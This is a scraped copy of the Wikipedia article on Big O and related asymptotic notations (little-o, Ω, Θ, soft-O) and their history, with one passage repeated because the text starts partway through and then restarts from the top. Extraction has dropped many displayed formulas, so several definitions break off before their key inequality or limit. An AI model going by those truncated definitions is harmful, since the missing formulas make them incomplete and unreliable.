some inconsistency in the choice of definition.[8] The statement "f(x)isO[g(x)]" as defined above is usually written asf(x) =O[g(x)]. Some consider this to be anabuse of notation, since the use of the equals sign could be misleading as it suggests a symmetry that this statement does not have. Asde Bruijnsays,O[x] =O[x2]is true butO[x2] =O[x]is not.[9]Knuthdescribes such statements as "one-way equalities", since if the sides could be reversed, "we could deduce ridiculous things liken=n2from the identitiesn=O[n2]andn2=O[n2]".[10]In another letter, Knuth also pointed out that[11] the equality sign is not symmetric with respect to such notations [as, in this notation,] mathematicians customarily use the '=' sign as they use the word 'is' in English: Aristotle is a man, but a man isn't necessarily Aristotle. For these reasons, it would be more precise to useset notationand writef(x) ∈O[g(x)]– read as: "f(x)is an element ofO[g(x)]", or "f(x)is in the setO[g(x)]" – thinking ofO[g(x)]as the class of all functionsh(x)such that|h(x)| ≤C|g(x)|for some positive real numberC.[10]However, the use of the equals sign is customary.[9][10] Big O notation can also be used in conjunction with other arithmetic operators in more complicated equations. For example,h(x) +O(f(x))denotes the collection of functions having the growth ofh(x)plus a part whose growth is limited to that off(x). Thus,g(x)=h(x)+O(f(x)){\displaystyle g(x)=h(x)+O(f(x))}expresses the same asg(x)−h(x)=O(f(x)).{\displaystyle g(x)-h(x)=O(f(x)).} Suppose analgorithmis being developed to operate on a set ofnelements. Its developers are interested in finding a functionT(n)that will express how long the algorithm will take to run (in some arbitrary measurement of time) in terms of the number of elements in the input set. The algorithm works by first calling a subroutine to sort the elements in the set and then perform its own operations. The sort has a known time complexity ofO(n2), and after the subroutine runs the algorithm must take an additional55n3+ 2n+ 10steps before it terminates. Thus the overall time complexity of the algorithm can be expressed asT(n) = 55n3+O(n2). Here the terms2n+ 10are subsumed within the faster-growingO(n2). Again, this usage disregards some of the formal meaning of the "=" symbol, but it does allow one to use the big O notation as a kind of convenient placeholder. In more complicated usage,O(·)can appear in different places in an equation, even several times on each side. For example, the following are true forn→∞{\displaystyle n\to \infty }:(n+1)2=n2+O(n),(n+O(n1/2))⋅(n+O(log⁡n))2=n3+O(n5/2),nO(1)=O(en).{\displaystyle {\begin{aligned}(n+1)^{2}&=n^{2}+O(n),\\(n+O(n^{1/2}))\cdot (n+O(\log n))^{2}&=n^{3}+O(n^{5/2}),\\n^{O(1)}&=O(e^{n}).\end{aligned}}}The meaning of such statements is as follows: foranyfunctions which satisfy eachO(·)on the left side, there aresomefunctions satisfying eachO(·)on the right side, such that substituting all these functions into the equation makes the two sides equal. For example, the third equation above means: "For any functionf(n) =O(1), there is some functiong(n) =O(en)such thatnf(n)=g(n)". In terms of the "set notation" above, the meaning is that the class of functions represented by the left side is a subset of the class of functions represented by the right side. In this use the "=" is a formal symbol that unlike the usual use of "=" is not asymmetric relation. Thus for examplenO(1)=O(en)does not imply the false statementO(en) =nO(1). Big O is typeset as an italicized uppercase "O", as in the following example:O(n2){\displaystyle O(n^{2})}.[12][13]InTeX, it is produced by simply typing 'O' inside math mode. Unlike Greek-named Bachmann–Landau notations, it needs no special symbol. However, some authors use the calligraphic variantO{\displaystyle {\mathcal {O}}}instead.[14][15] Here is a list of classes of functions that are commonly encountered when analyzing the running time of an algorithm. In each case,cis a positive constant andnincreases without bound. The slower-growing functions are generally listed first. The statementf(n)=O(n!){\displaystyle f(n)=O(n!)}is sometimes weakened tof(n)=O(nn){\displaystyle f(n)=O\left(n^{n}\right)}to derive simpler formulas for asymptotic complexity. For anyk>0{\displaystyle k>0}andc>0{\displaystyle c>0},O(nc(log⁡n)k){\displaystyle O(n^{c}(\log n)^{k})}is a subset ofO(nc+ε){\displaystyle O(n^{c+\varepsilon })}for anyε>0{\displaystyle \varepsilon >0},so may be considered as a polynomial with some bigger order. BigOis widely used in computer science. Together with some other related notations, it forms the family of Bachmann–Landau notations.[citation needed] Intuitively, the assertion "f(x)iso(g(x))" (read "f(x)is little-o ofg(x)" or "f(x)is of inferior order tog(x)") means thatg(x)grows much faster thanf(x), or equivalentlyf(x)grows much slower thang(x). As before, letfbe a real or complex valued function andga real valued function, both defined on some unbounded subset of the positivereal numbers, such thatg(x){\displaystyle g(x)}is strictly positive for all large enough values ofx. One writes if for every positive constantεthere exists a constantx0{\displaystyle x_{0}}such that For example, one has The difference between thedefinition of the big-O notationand the definition of little-o is that while the former has to be true forat least oneconstantM, the latter must hold foreverypositive constantε, however small.[18]In this way, little-o notation makes astronger statementthan the corresponding big-O notation: every function that is little-o ofgis also big-O ofg, but not every function that is big-O ofgis little-o ofg. For example,2x2=O(x2){\displaystyle 2x^{2}=O(x^{2})}but2x2≠o(x2){\displaystyle 2x^{2}\neq o(x^{2})}. Ifg(x){\displaystyle g(x)}is nonzero, or at least becomes nonzero beyond a certain point, the relationf(x)=o(g(x)){\displaystyle f(x)=o(g(x))}is equivalent to Little-o respects a number of arithmetic operations. For example, It also satisfies atransitivityrelation: Little-o can also be generalized to the finite case:[19] f(x)=o(g(x))asx→x0{\displaystyle f(x)=o(g(x))\quad {\text{ as }}x\to x_{0}}iff(x)=α(x)g(x){\displaystyle f(x)=\alpha (x)g(x)}for someα(x){\displaystyle \alpha (x)}withlimx→x0α(x)=0{\displaystyle \lim _{x\to x_{0}}\alpha (x)=0}. Or, ifg(x){\displaystyle g(x)}is nonzero in a neighbourhood aroundx0{\displaystyle x_{0}}: f(x)=o(g(x))asx→x0{\displaystyle f(x)=o(g(x))\quad {\text{ as }}x\to x_{0}}iflimx→x0f(x)g(x)=0{\displaystyle \lim _{x\to x_{0}}{\frac {f(x)}{g(x)}}=0}. This definition especially useful in the computation oflimitsusingTaylor series. For example: sin⁡x=x−x33!+…=x+o(x2)asx→0{\displaystyle \sin x=x-{\frac {x^{3}}{3!}}+\ldots =x+o(x^{2}){\text{ as }}x\to 0}, solimx→0sin⁡xx=limx→0x+o(x2)x=limx→01+o(x)=1{\displaystyle \lim _{x\to 0}{\frac {\sin x}{x}}=\lim _{x\to 0}{\frac {x+o(x^{2})}{x}}=\lim _{x\to 0}1+o(x)=1} Another asymptotic notation isΩ{\displaystyle \Omega }, read "big omega".[20]There are two widespread and incompatible definitions of the statement whereais some real number,∞{\displaystyle \infty }, or−∞{\displaystyle -\infty }, wherefandgare real functions defined in a neighbourhood ofa, and wheregis positive in this neighbourhood. The Hardy–Littlewood definition is used mainly inanalytic number theory, and the Knuth definition mainly incomputational complexity theory; the definitions are not equivalent. In 1914G.H. HardyandJ.E. Littlewoodintroduced the new symbolΩ,{\displaystyle \ \Omega \ ,}[21]which is defined as follows: Thusf(x)=Ω(g(x)){\displaystyle ~f(x)=\Omega {\bigl (}\ g(x)\ {\bigr )}~}is the negation off(x)=o(g(x)).{\displaystyle ~f(x)=o{\bigl (}\ g(x)\ {\bigr )}~.} In 1916 the same authors introduced the two new symbolsΩR{\displaystyle \ \Omega _{R}\ }andΩL,{\displaystyle \ \Omega _{L}\ ,}defined as:[22] These symbols were used byE. Landau, with the same meanings, in 1924.[23]Authors that followed Landau, however, use a different notation for the same definitions:[citation needed]The symbolΩR{\displaystyle \ \Omega _{R}\ }has been replaced by the current notationΩ+{\displaystyle \ \Omega _{+}\ }with the same definition, andΩL{\displaystyle \ \Omega _{L}\ }becameΩ−.{\displaystyle \ \Omega _{-}~.} These three symbolsΩ,Ω+,Ω−,{\displaystyle \ \Omega \ ,\Omega _{+}\ ,\Omega _{-}\ ,}as well asf(x)=Ω±(g(x)){\displaystyle \ f(x)=\Omega _{\pm }{\bigl (}\ g(x)\ {\bigr )}\ }(meaning thatf(x)=Ω+(g(x)){\displaystyle \ f(x)=\Omega _{+}{\bigl (}\ g(x)\ {\bigr )}\ }andf(x)=Ω−(g(x)){\displaystyle \ f(x)=\Omega _{-}{\bigl (}\ g(x)\ {\bigr )}\ }are both satisfied), are now currently used inanalytic number theory.[24][25] We have and more precisely We have and more precisely however In 1976Donald Knuthpublished a paper to justify his use of theΩ{\displaystyle \Omega }-symbol to describe a stronger property.[26]Knuth wrote: "For all the applications I have seen so far in computer science, a stronger requirement ... is much more appropriate". He defined with the comment: "Although I have changed Hardy and Littlewood's definition ofΩ{\displaystyle \Omega }, I feel justified in doing so because their definition is by no means in wide use, and because there are other ways to say what they want to say in the comparatively rare cases when their definition applies."[26] The limit definitions assumeg(n)>0{\displaystyle g(n)>0}for sufficiently largen{\displaystyle n}. The table is (partly) sorted from smallest to largest, in the sense thato,O,Θ,∼,{\displaystyle o,O,\Theta ,\sim ,}(Knuth's version of)Ω,ω{\displaystyle \Omega ,\omega }on functions correspond to<,≤,≈,=,{\displaystyle <,\leq ,\approx ,=,}≥,>{\displaystyle \geq ,>}on the real line[29](the Hardy–Littlewood version ofΩ{\displaystyle \Omega }, however, doesn't correspond to any such description). Computer science uses the bigO{\displaystyle O}, big ThetaΘ{\displaystyle \Theta }, littleo{\displaystyle o}, little omegaω{\displaystyle \omega }and Knuth's big OmegaΩ{\displaystyle \Omega }notations.[30]Analytic number theory often uses the bigO{\displaystyle O}, smallo{\displaystyle o}, Hardy's≍{\displaystyle \asymp },[31]Hardy–Littlewood's big OmegaΩ{\displaystyle \Omega }(with or without the +, − or ± subscripts) and∼{\displaystyle \sim }notations.[24]The small omegaω{\displaystyle \omega }notation is not used as often in analysis.[32] Informally, especially in computer science, the bigOnotation often can be used somewhat differently to describe an asymptotictightbound where using big Theta Θ notation might be more factually appropriate in a given context.[33]For example, when considering a functionT(n) = 73n3+ 22n2+ 58, all of the following are generally acceptable, but tighter bounds (such as numbers 2 and 3 below) are usually strongly preferred over looser bounds (such as number 1 below). The equivalent English statements are respectively: So while all three statements are true, progressively more information is contained in each. In some fields, however, the big O notation (number 2 in the lists above) would be used more commonly than the big Theta notation (items numbered 3 in the lists above). For example, ifT(n) represents the running time of a newly developed algorithm for input sizen, the inventors and users of the algorithm might be more inclined to put an upper asymptotic bound on how long it will take to run without making an explicit statement about the lower asymptotic bound. In their bookIntroduction to Algorithms,Cormen,Leiserson,RivestandSteinconsider the set of functionsfwhich satisfy In a correct notation this set can, for instance, be calledO(g), where O(g)={f:there exist positive constantscandn0such that0≤f(n)≤cg(n)for alln≥n0}.{\displaystyle O(g)=\{f:{\text{there exist positive constants}}~c~{\text{and}}~n_{0}~{\text{such that}}~0\leq f(n)\leq cg(n){\text{ for all }}n\geq n_{0}\}.}[34] The authors state that the use of equality operator (=) to denote set membership rather than the set membership operator (∈) is an abuse of notation, but that doing so has advantages.[6]Inside an equation or inequality, the use of asymptotic notation stands for an anonymous function in the setO(g), which eliminates lower-order terms, and helps to reduce inessential clutter in equations, for example:[35] Another notation sometimes used in computer science isÕ(readsoft-O), which hides polylogarithmic factors. There are two definitions in use: some authors usef(n) =Õ(g(n)) asshorthandforf(n) =O(g(n)logkn)for somek, while others use it as shorthand forf(n) =O(g(n) logkg(n)).[36]Wheng(n)is polynomial inn, there is no difference; however, the latter definition allows one to say, e.g. thatn2n=O~(2n){\displaystyle n2^{n}={\tilde {O}}(2^{n})}while the former definition allows forlogk⁡n=O~(1){\displaystyle \log ^{k}n={\tilde {O}}(1)}for any constantk. Some authors writeO*for the same purpose as the latter definition.[37]Essentially, it is bigOnotation, ignoringlogarithmic factorsbecause thegrowth-rateeffects of some other super-logarithmic function indicate a growth-rate explosion for large-sized input parameters that is more important to predicting bad run-time performance than the finer-point effects contributed by the logarithmic-growth factor(s). This notation is often used to obviate the "nitpicking" within growth-rates that are stated as too tightly bounded for the matters at hand (since logknis alwayso(nε) for any constantkand anyε> 0). Also, theLnotation, defined as is convenient for functions that are betweenpolynomialandexponentialin terms ofln⁡n{\displaystyle \ln n}. The generalization to functions taking values in anynormed vector spaceis straightforward (replacing absolute values by norms), wherefandgneed not take their values in the same space. A generalization to functionsgtaking values in anytopological groupis also possible[citation needed]. The "limiting process"x→xocan also be generalized by introducing an arbitraryfilter base, i.e. to directednetsfandg. Theonotation can be used to definederivativesanddifferentiabilityin quite general spaces, and also (asymptotical) equivalence of functions, which is anequivalence relationand a more restrictive notion than the relationship "fis Θ(g)" from above. (It reduces to limf/g= 1 iffandgare positive real valued functions.) For example, 2xis Θ(x), but2x−xis noto(x). The symbol O was first introduced by number theoristPaul Bachmannin 1894, in the second volume of his bookAnalytische Zahlentheorie("analytic number theory").[1]The number theoristEdmund Landauadopted it, and was thus inspired to introduce in 1909 the notation o;[2]hence both are now called Landau symbols. These notations were used in applied mathematics during the 1950s for asymptotic analysis.[38]The symbolΩ{\displaystyle \Omega }(in the sense "is not anoof") was introduced in 1914 by Hardy and Littlewood.[21]Hardy and Littlewood also introduced in 1916 the symbolsΩR{\displaystyle \Omega _{R}}("right") andΩL{\displaystyle \Omega _{L}}("left"),[22]precursors of the modern symbolsΩ+{\displaystyle \Omega _{+}}("is not smaller than a small o of") andΩ−{\displaystyle \Omega _{-}}("is not larger than a small o of"). Thus the Omega symbols (with their original meanings) are sometimes also referred to as "Landau symbols". This notationΩ{\displaystyle \Omega }became commonly used in number theory at least since the 1950s.[39] The symbol∼{\displaystyle \sim }, although it had been used before with different meanings,[29]was given its modern definition by Landau in 1909[40]and by Hardy in 1910.[41]Just above on the same page of his tract Hardy defined the symbol≍{\displaystyle \asymp }, wheref(x)≍g(x){\displaystyle f(x)\asymp g(x)}means that bothf(x)=O(g(x)){\displaystyle f(x)=O(g(x))}andg(x)=O(f(x)){\displaystyle g(x)=O(f(x))}are satisfied. The notation is still currently used in analytic number theory.[42][31]In his tract Hardy also proposed the symbol≍−{\displaystyle \mathbin {\,\asymp \;\;\;\;\!\!\!\!\!\!\!\!\!\!\!\!\!-} }, wheref≍−g{\displaystyle f\mathbin {\,\asymp \;\;\;\;\!\!\!\!\!\!\!\!\!\!\!\!\!-} g}means thatf∼Kg{\displaystyle f\sim Kg}for some constantK≠0{\displaystyle K\not =0}. In the 1970s the big O was popularized in computer science byDonald Knuth, who proposed the different notationf(x)=Θ(g(x)){\displaystyle f(x)=\Theta (g(x))}for Hardy'sf(x)≍g(x){\displaystyle f(x)\asymp g(x)}, and proposed a different definition for the Hardy and Littlewood Omega notation.[26] Two other symbols coined by Hardy were (in terms of the modernOnotation) (Hardy however never defined or used the notation≺≺{\displaystyle \prec \!\!\prec }, nor≪{\displaystyle \ll }, as it has been sometimes reported). Hardy introduced the symbols≼{\displaystyle \preccurlyeq }and≺{\displaystyle \prec }(as well as the already mentioned other symbols) in his 1910 tract "Orders of Infinity", and made use of them only in three papers (1910–1913). In his nearly 400 remaining papers and books he consistently used the Landau symbols O and o. Hardy's symbols≼{\displaystyle \preccurlyeq }and≺{\displaystyle \prec }(as well as≍−{\displaystyle \mathbin {\,\asymp \;\;\;\;\!\!\!\!\!\!\!\!\!\!\!\!\!-} }) are not used anymore. On the other hand, in the 1930s,[43]the Russian number theoristIvan Matveyevich Vinogradovintroduced his notation≪{\displaystyle \ll }, which has been increasingly used in number theory instead of theO{\displaystyle O}notation. We have and frequently both notations are used in the same paper. The big-O originally stands for "order of" ("Ordnung", Bachmann 1894), and is thus a Latin letter. Neither Bachmann nor Landau ever call it "Omicron". The symbol was much later on (1976) viewed by Knuth as a capitalomicron,[26]probably in reference to his definition of the symbolOmega. The digitzeroshould not be used.
https://en.wikipedia.org/wiki/Big_O_notation
BigOnotationis a mathematical notation that describes thelimiting behaviorof afunctionwhen theargumenttends towards a particular value or infinity. Big O is a member of afamily of notationsinvented by German mathematiciansPaul Bachmann,[1]Edmund Landau,[2]and others, collectively calledBachmann–Landau notationorasymptotic notation. The letter O was chosen by Bachmann to stand forOrdnung, meaning theorder of approximation. Incomputer science, big O notation is used toclassify algorithmsaccording to how their run time or space requirements[a]grow as the input size grows.[3]Inanalytic number theory, big O notation is often used to express a bound on the difference between anarithmetical functionand a better understood approximation; a famous example of such a difference is the remainder term in theprime number theorem. Big O notation is also used in many other fields to provide similar estimates. Big O notation characterizes functions according to their growth rates: different functions with the same asymptotic growth rate may be represented using the same O notation. The letter O is used because the growth rate of a function is also referred to as theorder of the function. A description of a function in terms of big O notation usually only provides anupper boundon the growth rate of the function. Associated with big O notation are several related notations, using the symbolso{\displaystyle o},Ω{\displaystyle \Omega },ω{\displaystyle \omega }, andΘ{\displaystyle \Theta }to describe other kinds of bounds on asymptotic growth rates.[3] Letf,{\displaystyle f,}the function to be estimated, be arealorcomplexvalued function, and letg,{\displaystyle g,}the comparison function, be a real valued function. Let both functions be defined on someunboundedsubsetof the positivereal numbers, andg(x){\displaystyle g(x)}be non-zero (often, but not necessarily, strictly positive) for all large enough values ofx.{\displaystyle x.}[4]One writesf(x)=O(g(x))asx→∞{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}\quad {\text{ as }}x\to \infty }and it is read "f(x){\displaystyle f(x)}is big O ofg(x){\displaystyle g(x)}" or more often "f(x){\displaystyle f(x)}is of the order ofg(x){\displaystyle g(x)}" if theabsolute valueoff(x){\displaystyle f(x)}is at most a positive constant multiple of the absolute value ofg(x){\displaystyle g(x)}for all sufficiently large values ofx.{\displaystyle x.}That is,f(x)=O(g(x)){\displaystyle f(x)=O{\bigl (}g(x){\bigr )}}if there exists a positive real numberM{\displaystyle M}and a real numberx0{\displaystyle x_{0}}such that|f(x)|≤M|g(x)|for allx≥x0.{\displaystyle |f(x)|\leq M\ |g(x)|\quad {\text{ for all }}x\geq x_{0}~.}In many contexts, the assumption that we are interested in the growth rate as the variablex{\displaystyle \ x\ }goes to infinity or to zero is left unstated, and one writes more simply thatf(x)=O(g(x)).{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}.}The notation can also be used to describe the behavior off{\displaystyle f}near some real numbera{\displaystyle a}(often,a=0{\displaystyle a=0}): we sayf(x)=O(g(x))asx→a{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}\quad {\text{ as }}\ x\to a}if there exist positive numbersδ{\displaystyle \delta }andM{\displaystyle M}such that for all definedx{\displaystyle x}with0<|x−a|<δ,{\displaystyle 0<|x-a|<\delta ,}|f(x)|≤M|g(x)|.{\displaystyle |f(x)|\leq M|g(x)|.}Asg(x){\displaystyle g(x)}is non-zero for adequately large (or small) values ofx,{\displaystyle x,}both of these definitions can be unified using thelimit superior:f(x)=O(g(x))asx→a{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}\quad {\text{ as }}\ x\to a}iflim supx→a|f(x)||g(x)|<∞.{\displaystyle \limsup _{x\to a}{\frac {\left|f(x)\right|}{\left|g(x)\right|}}<\infty .}And in both of these definitions thelimit pointa{\displaystyle a}(whether∞{\displaystyle \infty }or not) is acluster pointof the domains off{\displaystyle f}andg,{\displaystyle g,}i. e., in every neighbourhood ofa{\displaystyle a}there have to be infinitely many points in common. Moreover, as pointed out in the article about thelimit inferior and limit superior, thelim supx→a{\displaystyle \textstyle \limsup _{x\to a}}(at least on theextended real number line) always exists. In computer science, a slightly more restrictive definition is common:f{\displaystyle f}andg{\displaystyle g}are both required to be functions from some unbounded subset of thepositive integersto the nonnegative real numbers; thenf(x)=O(g(x)){\displaystyle f(x)=O{\bigl (}g(x){\bigr )}}if there exist positive integer numbersM{\displaystyle M}andn0{\displaystyle n_{0}}such that|f(n)|≤M|g(n)|{\displaystyle |f(n)|\leq M|g(n)|}for alln≥n0.{\displaystyle n\geq n_{0}.}[5] In typical usage theO{\displaystyle O}notation is asymptotical, that is, it refers to very largex{\displaystyle x}. In this setting, the contribution of the terms that grow "most quickly" will eventually make the other ones irrelevant. As a result, the following simplification rules can be applied: For example, letf(x)=6x4−2x3+5{\displaystyle f(x)=6x^{4}-2x^{3}+5}, and suppose we wish to simplify this function, usingO{\displaystyle O}notation, to describe its growth rate asx→∞{\displaystyle x\rightarrow \infty }. This function is the sum of three terms:6x4{\displaystyle 6x^{4}},−2x3{\displaystyle -2x^{3}}, and5{\displaystyle 5}. Of these three terms, the one with the highest growth rate is the one with the largest exponent as a function ofx{\displaystyle x}, namely6x4{\displaystyle 6x^{4}}. Now one may apply the second rule:6x4{\displaystyle 6x^{4}}is a product of6{\displaystyle 6}andx4{\displaystyle x^{4}}in which the first factor does not depend onx{\displaystyle x}. Omitting this factor results in the simplified formx4{\displaystyle x^{4}}. Thus, we say thatf(x){\displaystyle f(x)}is a "big O" ofx4{\displaystyle x^{4}}. Mathematically, we can writef(x)=O(x4){\displaystyle f(x)=O(x^{4})}. One may confirm this calculation using the formal definition: letf(x)=6x4−2x3+5{\displaystyle f(x)=6x^{4}-2x^{3}+5}andg(x)=x4{\displaystyle g(x)=x^{4}}. Applying theformal definitionfrom above, the statement thatf(x)=O(x4){\displaystyle f(x)=O(x^{4})}is equivalent to its expansion,|f(x)|≤Mx4{\displaystyle |f(x)|\leq Mx^{4}}for some suitable choice of a real numberx0{\displaystyle x_{0}}and a positive real numberM{\displaystyle M}and for allx>x0{\displaystyle x>x_{0}}. To prove this, letx0=1{\displaystyle x_{0}=1}andM=13{\displaystyle M=13}. Then, for allx>x0{\displaystyle x>x_{0}}:|6x4−2x3+5|≤6x4+|2x3|+5≤6x4+2x4+5x4=13x4{\displaystyle {\begin{aligned}|6x^{4}-2x^{3}+5|&\leq 6x^{4}+|2x^{3}|+5\\&\leq 6x^{4}+2x^{4}+5x^{4}\\&=13x^{4}\end{aligned}}}so|6x4−2x3+5|≤13x4.{\displaystyle |6x^{4}-2x^{3}+5|\leq 13x^{4}.} Big O notation has two main areas of application: In both applications, the functiong(x){\displaystyle g(x)}appearing within theO(⋅){\displaystyle O(\cdot )}is typically chosen to be as simple as possible, omitting constant factors and lower order terms. There are two formally close, but noticeably different, usages of this notation:[citation needed] This distinction is only in application and not in principle, however—the formal definition for the "big O" is the same for both cases, only with different limits for the function argument.[original research?] Big O notation is useful whenanalyzing algorithmsfor efficiency. For example, the time (or the number of steps) it takes to complete a problem of sizen{\displaystyle n}might be found to beT(n)=4n2−2n+2{\displaystyle T(n)=4n^{2}-2n+2}. Asn{\displaystyle n}grows large, then2{\displaystyle n^{2}}termwill come to dominate, so that all other terms can be neglected—for instance whenn=500{\displaystyle n=500}, the term4n2{\displaystyle 4n^{2}}is 1000 times as large as the2n{\displaystyle 2n}term. Ignoring the latter would have negligible effect on the expression's value for most purposes. Further, thecoefficientsbecome irrelevant if we compare to any otherorderof expression, such as an expression containing a termn3{\displaystyle n^{3}}orn4{\displaystyle n^{4}}. Even ifT(n)=1000000n2{\displaystyle T(n)=1000000n^{2}}, ifU(n)=n3{\displaystyle U(n)=n^{3}}, the latter will always exceed the former oncengrows larger than1000000{\displaystyle 1000000},viz.T(1000000)=10000003=U(1000000){\displaystyle T(1000000)=1000000^{3}=U(1000000)}. Additionally, the number of steps depends on the details of the machine model on which the algorithm runs, but different types of machines typically vary by only a constant factor in the number of steps needed to execute an algorithm. So the big O notation captures what remains: we write either or and say that the algorithm hasorder ofn2time complexity. The sign "=" is not meant to express "is equal to" in its normal mathematical sense, but rather a more colloquial "is", so the second expression is sometimes considered more accurate (see the "Equals sign" discussion below) while the first is considered by some as anabuse of notation.[6] Big O can also be used to describe theerror termin an approximation to a mathematical function. The most significant terms are written explicitly, and then the least-significant terms are summarized in a single big O term. Consider, for example, theexponential seriesand two expressions of it that are valid whenxis small:ex=1+x+x22!+x33!+x44!+⋯for all finitex=1+x+x22+O(x3)asx→0=1+x+O(x2)asx→0{\displaystyle {\begin{aligned}e^{x}&=1+x+{\frac {x^{2}}{2!}}+{\frac {x^{3}}{3!}}+{\frac {x^{4}}{4!}}+\dotsb &&{\text{for all finite }}x\\[4pt]&=1+x+{\frac {x^{2}}{2}}+O(x^{3})&&{\text{as }}x\to 0\\[4pt]&=1+x+O(x^{2})&&{\text{as }}x\to 0\end{aligned}}}The middle expression (the one withO(x3){\displaystyle O(x^{3})}) means the absolute-value of the errorex−(1+x+x22){\displaystyle e^{x}-(1+x+{\frac {x^{2}}{2}})}is at most some constant times|x3!|{\displaystyle |x^{3}!|}whenx{\displaystyle x}is close enough to0{\displaystyle 0}. If the functionfcan be written as a finite sum of other functions, then the fastest growing one determines the order off(n). For example, In particular, if a function may be bounded by a polynomial inn, then asntends toinfinity, one may disregardlower-orderterms of the polynomial. The setsO(nc)andO(cn)are very different. Ifcis greater than one, then the latter grows much faster. A function that grows faster thanncfor anycis calledsuperpolynomial. One that grows more slowly than any exponential function of the formcnis calledsubexponential. An algorithm can require time that is both superpolynomial and subexponential; examples of this include the fastest known algorithms forinteger factorizationand the functionnlogn. We may ignore any powers ofninside of the logarithms. The setO(logn)is exactly the same asO(log(nc)). The logarithms differ only by a constant factor (sincelog(nc) =clogn) and thus the big O notation ignores that. Similarly, logs with different constant bases are equivalent. On the other hand, exponentials with different bases are not of the same order. For example,2nand3nare not of the same order. Changing units may or may not affect the order of the resulting algorithm. Changing units is equivalent to multiplying the appropriate variable by a constant wherever it appears. For example, if an algorithm runs in the order ofn2, replacingnbycnmeans the algorithm runs in the order ofc2n2, and the big O notation ignores the constantc2. This can be written asc2n2= O(n2). If, however, an algorithm runs in the order of2n, replacingnwithcngives2cn= (2c)n. This is not equivalent to2nin general. Changing variables may also affect the order of the resulting algorithm. For example, if an algorithm's run time isO(n)when measured in terms of the numbernofdigitsof an input numberx, then its run time isO(logx)when measured as a function of the input numberxitself, becausen=O(logx). Iff1=O(g1){\displaystyle f_{1}=O(g_{1})}andf2=O(g2){\displaystyle f_{2}=O(g_{2})}thenf1+f2=O(max(|g1|,|g2|)){\displaystyle f_{1}+f_{2}=O(\max(|g_{1}|,|g_{2}|))}. It follows that iff1=O(g){\displaystyle f_{1}=O(g)}andf2=O(g){\displaystyle f_{2}=O(g)}thenf1+f2∈O(g){\displaystyle f_{1}+f_{2}\in O(g)}. Letkbe a nonzero constant. ThenO(|k|⋅g)=O(g){\displaystyle O(|k|\cdot g)=O(g)}. In other words, iff=O(g){\displaystyle f=O(g)}, thenk⋅f=O(g).{\displaystyle k\cdot f=O(g).} BigO(and little o, Ω, etc.) can also be used with multiple variables. To define bigOformally for multiple variables, supposef{\displaystyle f}andg{\displaystyle g}are two functions defined on some subset ofRn{\displaystyle \mathbb {R} ^{n}}. We say if and only if there exist constantsM{\displaystyle M}andC>0{\displaystyle C>0}such that|f(x)|≤C|g(x)|{\displaystyle |f(\mathbf {x} )|\leq C|g(\mathbf {x} )|}for allx{\displaystyle \mathbf {x} }withxi≥M{\displaystyle x_{i}\geq M}for somei.{\displaystyle i.}[7]Equivalently, the condition thatxi≥M{\displaystyle x_{i}\geq M}for somei{\displaystyle i}can be written‖x‖∞≥M{\displaystyle \|\mathbf {x} \|_{\infty }\geq M}, where‖x‖∞{\displaystyle \|\mathbf {x} \|_{\infty }}denotes theChebyshev norm. For example, the statement asserts that there exist constantsCandMsuch that whenever eitherm≥M{\displaystyle m\geq M}orn≥M{\displaystyle n\geq M}holds. This definition allows all of the coordinates ofx{\displaystyle \mathbf {x} }to increase to infinity. In particular, the statement (i.e.,∃C∃M∀n∀m⋯{\displaystyle \exists C\,\exists M\,\forall n\,\forall m\,\cdots }) is quite different from (i.e.,∀m∃C∃M∀n⋯{\displaystyle \forall m\,\exists C\,\exists M\,\forall n\,\cdots }). Under this definition, the subset on which a function is defined is significant when generalizing statements from the univariate setting to the multivariate setting. For example, iff(n,m)=1{\displaystyle f(n,m)=1}andg(n,m)=n{\displaystyle g(n,m)=n}, thenf(n,m)=O(g(n,m)){\displaystyle f(n,m)=O(g(n,m))}if we restrictf{\displaystyle f}andg{\displaystyle g}to[1,∞)2{\displaystyle [1,\infty )^{2}}, but not if they are defined on[0,∞)2{\displaystyle [0,\infty )^{2}}. This is not the only generalization of big O to multivariate functions, and in practice, there is some inconsistency in the choice of definition.[8] The statement "f(x)isO[g(x)]" as defined above is usually written asf(x) =O[g(x)]. Some consider this to be anabuse of notation, since the use of the equals sign could be misleading as it suggests a symmetry that this statement does not have. Asde Bruijnsays,O[x] =O[x2]is true butO[x2] =O[x]is not.[9]Knuthdescribes such statements as "one-way equalities", since if the sides could be reversed, "we could deduce ridiculous things liken=n2from the identitiesn=O[n2]andn2=O[n2]".[10]In another letter, Knuth also pointed out that[11] the equality sign is not symmetric with respect to such notations [as, in this notation,] mathematicians customarily use the '=' sign as they use the word 'is' in English: Aristotle is a man, but a man isn't necessarily Aristotle. For these reasons, it would be more precise to useset notationand writef(x) ∈O[g(x)]– read as: "f(x)is an element ofO[g(x)]", or "f(x)is in the setO[g(x)]" – thinking ofO[g(x)]as the class of all functionsh(x)such that|h(x)| ≤C|g(x)|for some positive real numberC.[10]However, the use of the equals sign is customary.[9][10] Big O notation can also be used in conjunction with other arithmetic operators in more complicated equations. For example,h(x) +O(f(x))denotes the collection of functions having the growth ofh(x)plus a part whose growth is limited to that off(x). Thus,g(x)=h(x)+O(f(x)){\displaystyle g(x)=h(x)+O(f(x))}expresses the same asg(x)−h(x)=O(f(x)).{\displaystyle g(x)-h(x)=O(f(x)).} Suppose analgorithmis being developed to operate on a set ofnelements. Its developers are interested in finding a functionT(n)that will express how long the algorithm will take to run (in some arbitrary measurement of time) in terms of the number of elements in the input set. The algorithm works by first calling a subroutine to sort the elements in the set and then perform its own operations. The sort has a known time complexity ofO(n2), and after the subroutine runs the algorithm must take an additional55n3+ 2n+ 10steps before it terminates. Thus the overall time complexity of the algorithm can be expressed asT(n) = 55n3+O(n2). Here the terms2n+ 10are subsumed within the faster-growingO(n2). Again, this usage disregards some of the formal meaning of the "=" symbol, but it does allow one to use the big O notation as a kind of convenient placeholder. In more complicated usage,O(·)can appear in different places in an equation, even several times on each side. For example, the following are true forn→∞{\displaystyle n\to \infty }:(n+1)2=n2+O(n),(n+O(n1/2))⋅(n+O(log⁡n))2=n3+O(n5/2),nO(1)=O(en).{\displaystyle {\begin{aligned}(n+1)^{2}&=n^{2}+O(n),\\(n+O(n^{1/2}))\cdot (n+O(\log n))^{2}&=n^{3}+O(n^{5/2}),\\n^{O(1)}&=O(e^{n}).\end{aligned}}}The meaning of such 